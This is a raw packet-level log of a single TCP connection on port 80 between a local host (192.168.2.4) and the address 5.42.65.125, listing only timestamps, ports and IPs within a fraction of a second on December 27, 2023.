Dec 27, 2023 17:57:26.034147024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.034147978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.034163952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.034173012 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.034177065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.034194946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.034203053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.034210920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.034224033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.034235001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.034239054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.034255028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.034269094 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.034297943 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.034873962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.034889936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.034905910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.034938097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.034955978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.034971952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.035028934 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.035074949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.035092115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.035104036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.035119057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.035118103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.035128117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.035137892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.035145998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.035176039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.035190105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.035211086 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.035237074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.035240889 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.035254002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.035269976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.035284996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.035303116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.035365105 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.035968065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.036014080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.036029100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.036040068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.036048889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.036089897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.036103010 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.036104918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.036135912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.036153078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.036168098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.036186934 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.036259890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.036274910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.036288977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.036305904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.036314964 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.036320925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.036334038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.036343098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.036345005 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.036387920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.036844015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.036859035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.036875010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.036890984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.036905050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.036906958 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.036917925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.036926031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.036928892 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.036973953 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.037012100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.037024975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.037038088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.037046909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.037054062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.037055969 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.037065029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.037077904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.037094116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.037105083 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.037108898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.037134886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.037153959 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.037811041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.037826061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.038996935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.090514898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.090538979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.090554953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.090569019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.090583086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.090599060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.090612888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.090620995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.090637922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.090641975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.090652943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.090671062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.090683937 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.090706110 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.090745926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.090899944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.090919018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.090933084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.090946913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.090950966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.090961933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.090981007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.090985060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.090997934 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.091001034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.091018915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.091027975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.091032982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.091048002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.091062069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.091073990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.091078043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.091094971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.091104031 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.091111898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.091121912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.091125965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.091140032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.091154099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.091157913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.091169119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.091185093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.091186047 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.091198921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.091213942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.091213942 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.091228962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.091238022 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.091243029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.091258049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.091264963 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.091274023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.091289043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.091312885 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.091345072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.091820002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.091834068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.091877937 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.091909885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.091927052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.091941118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.091967106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.091993093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.092010021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.092025042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.092039108 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.092039108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.092056036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.092065096 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.092097044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.092113018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.092127085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.092140913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.092149019 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.092155933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.092171907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.092181921 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.092209101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.092235088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.092247963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.092258930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.092284918 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.092788935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.092807055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.092820883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.092868090 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.092873096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.092889071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.092906952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.092933893 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.092933893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.092987061 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.092999935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.093018055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.093033075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.093048096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.093061924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.093065023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.093096972 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.093343019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.093358040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.093370914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.093389988 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.093400002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.093575001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.093591928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.093605042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.093619108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.093631029 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.093631983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.093647003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.093662977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.093673944 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.093679905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.093694925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.093697071 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.093709946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.093725920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.093728065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.093739986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.093754053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.093754053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.093770027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.093777895 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.093785048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.093799114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.093808889 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.094454050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.094470024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.094485044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.094505072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.094540119 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.094628096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.094641924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.094656944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.094670057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.094674110 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.094685078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.094698906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.094700098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.094712973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.094727993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.094728947 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.094743013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.094759941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.094768047 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.094774961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.094789028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.094789982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.094805002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.094820023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.094820976 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.094835997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.094850063 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.094851017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.094887018 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.095232010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.095278978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.095324993 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.095325947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.095357895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.095371962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.095376015 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.095386982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.095401049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.095413923 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.095437050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.095475912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.095490932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.095504999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.095519066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.095527887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.095575094 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.095890045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.095936060 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.095993996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.096009970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.096030951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.096045971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.096060038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.096072912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.096074104 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.096098900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.096107006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.096112967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.096127033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.096132994 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.096147060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.096153021 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.096199036 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.096235037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.096250057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.096265078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.096277952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.096291065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.096292973 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.096309900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.096318960 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.096324921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.096338987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.096354961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.096376896 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.096862078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.096878052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.096893072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.096932888 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.096936941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.096987009 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.096991062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.097007990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.097058058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.097073078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.097105026 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.097121000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.097143888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.097158909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.097172976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.097187996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.097196102 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.097203970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.097218037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.097220898 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.097232103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.097245932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.097256899 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.097268105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.097284079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.097285986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.097299099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.097331047 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.097848892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.097865105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.097877979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.097893000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.097908020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.097910881 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.097945929 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.097963095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.097979069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.097991943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.098006964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.098022938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.098022938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.098037004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.098046064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.098053932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.098089933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.098326921 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.098479986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.098495007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.098512888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.098526955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.098531961 CET	49738	80	192.168.2.4	5.42.65.125
